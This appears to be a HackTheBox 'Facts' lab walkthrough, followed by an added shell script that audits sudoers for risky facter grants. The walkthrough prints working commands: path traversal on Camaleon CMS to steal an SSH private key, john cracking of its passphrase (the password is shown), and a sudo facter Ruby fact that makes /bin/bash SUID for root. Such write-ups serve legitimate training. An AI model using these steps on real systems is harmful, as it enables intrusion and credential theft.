Yesterday, 01:52 PM
FACTS - HACKTHEBOX
LINUX - EASY
IP: 10.129.69.95 (you'll have a different IP)
USERS (get w /etc/passwd)
-----
william
trivia
RECON
-----
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.129.69.95
22/OpenSSH 9.9p1
80/nginx 1.26.3
- path traversal on Camaleon CMS 2.9.0 (CVE-2024-46987) (base vulnerable version 2.8.0 but works on 2.9.0)
54321/http ?
EXPLOITATION
------------
grabbed /home/trivia/.ssh/id_ed25519 via path traversal:
http://facts.htb/admin/media/download_pr...id_ed25519
bruteforced the passphrase:
ssh2john id_ed25519 > hash.txt
john --wordlist=rockyou.txt hash.txt
password: dragonballz
ssh login as trivia:
ssh -i id_ed25519 trivia@facts.htb (password: dragonballz)
PRIVESC
-------
sudo -l shows /usr/bin/facter - exploited it to create SUID on bash
mkdir -p /tmp/.exploit/facter
cat > /tmp/.exploit/facter/root.rb << 'EOF'
Facter.add(:exploit) do
  setcode do
    system("chmod +s /bin/bash")
  end
end
EOF
sudo /usr/bin/facter --custom-dir /tmp/.exploit/facter
/bin/bash -p
got root :)
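
Added example, not part of the original post: a defender-side audit for the sudo rule the PRIVESC step relies on. It flags sudoers entries that let the caller choose facter's arguments (and so --custom-dir) and checks for the setuid/setgid bit that "chmod +s" leaves on /bin/bash. The sudoers lines are constructed samples and the function names are hypothetical.

```shell
#!/bin/sh
# Added example: audit sudoers-style rules for facter grants that let the
# caller pick arguments (and therefore --custom-dir). Sample data is constructed.

# classify_facter_grant LINE -> none | any-args | wildcard | fixed-args | no-args
classify_facter_grant() {
    # Ignore comments and rules that do not name a .../facter binary.
    printf '%s\n' "$1" |
        grep -Eq '^[^#]*[[:space:]:,](/[^[:space:],]+)*/facter([[:space:],]|$)' ||
        { echo none; return 0; }
    # The argument list is whatever follows the path, up to the next comma.
    args=$(printf '%s\n' "$1" |
        sed -E 's#^.*/facter([^,]*).*$#\1#; s/^[[:space:]]+//; s/[[:space:]]+$//')
    case $args in
        '')   echo any-args ;;    # no list in sudoers means every argument is allowed
        '""') echo no-args ;;     # "" means the command must be run with no arguments
        *\**) echo wildcard ;;    # a wildcard can match --custom-dir <path>
        *)    echo fixed-args ;;
    esac
}

# audit_sudoers: read rules on stdin, print the ones that need review.
audit_sudoers() {
    while IFS= read -r rule; do
        verdict=$(classify_facter_grant "$rule")
        case $verdict in
            any-args|wildcard) printf 'REVIEW (%s): %s\n' "$verdict" "$rule" ;;
        esac
    done
}

# shell_is_setid PATH: true if the file carries a setuid or setgid bit,
# which is what "chmod +s" leaves behind on /bin/bash.
shell_is_setid() { [ -u "$1" ] || [ -g "$1" ]; }

# Constructed sample rules (not taken from the target host).
SAMPLE_RULES='trivia ALL=(ALL) NOPASSWD: /usr/bin/facter
ops ALL=(root) /usr/bin/facter ""
ci ALL=(root) NOPASSWD: /usr/bin/facter --json *
# william ALL=(ALL) /usr/bin/facter
william ALL=(root) /usr/bin/systemctl status nginx'

printf '%s\n' "$SAMPLE_RULES" | audit_sudoers
if shell_is_setid /bin/bash; then echo 'ALERT: /bin/bash is setuid/setgid'; fi
```

On a real host, feed audit_sudoers the output of `sudo cat /etc/sudoers /etc/sudoers.d/*`; a rule that must stay should pin the argument list or use "" so no custom fact directory can be supplied.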
